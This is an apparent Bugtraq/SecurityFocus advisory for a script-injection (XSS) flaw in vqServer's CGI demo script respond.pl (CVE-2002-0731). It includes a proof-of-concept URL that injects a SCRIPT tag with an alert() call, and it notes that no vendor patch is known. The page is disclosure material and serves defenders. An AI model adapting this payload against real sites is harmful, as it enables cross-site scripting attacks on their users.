vqServer CGI Demo Program Script Injection Vulnerability
BID:4573
Info
vqServer CGI Demo Program Script Injection Vulnerability
| Bugtraq ID: | 4573 |
| Class: | Input Validation Error |
| CVE: |
CVE-2002-0731 |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 21 2002 12:00AM |
| Updated: | Jul 11 2009 12:46PM |
| Credit: | Discovered by Matthew Murphy <[email protected]>. |
| Vulnerable: |
vqSoft vqServer for Windows 1.9.55 vqSoft vqServer for Windows 1.9.47 vqSoft vqServer for Windows 1.9.30 vqSoft vqServer for Windows 1.9 |
| Not Vulnerable: | |
Exploit / POC
vqServer CGI Demo Program Script Injection Vulnerability
The following example is provided by Matthew Murphy <[email protected]>:
http://localhost/cgi/vq/demos/respond.pl?<SCRIPT>alert("I%20should%20not%20be%20able%20to%20do%20this!!!")</SCRIPT>
The following example is provided by Matthew Murphy <[email protected]>:
http://localhost/cgi/vq/demos/respond.pl?<SCRIPT>alert("I%20should%20not%20be%20able%20to%20do%20this!!!")</SCRIPT>
Solution / Fix
vqServer CGI Demo Program Script Injection Vulnerability
Solution:
Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.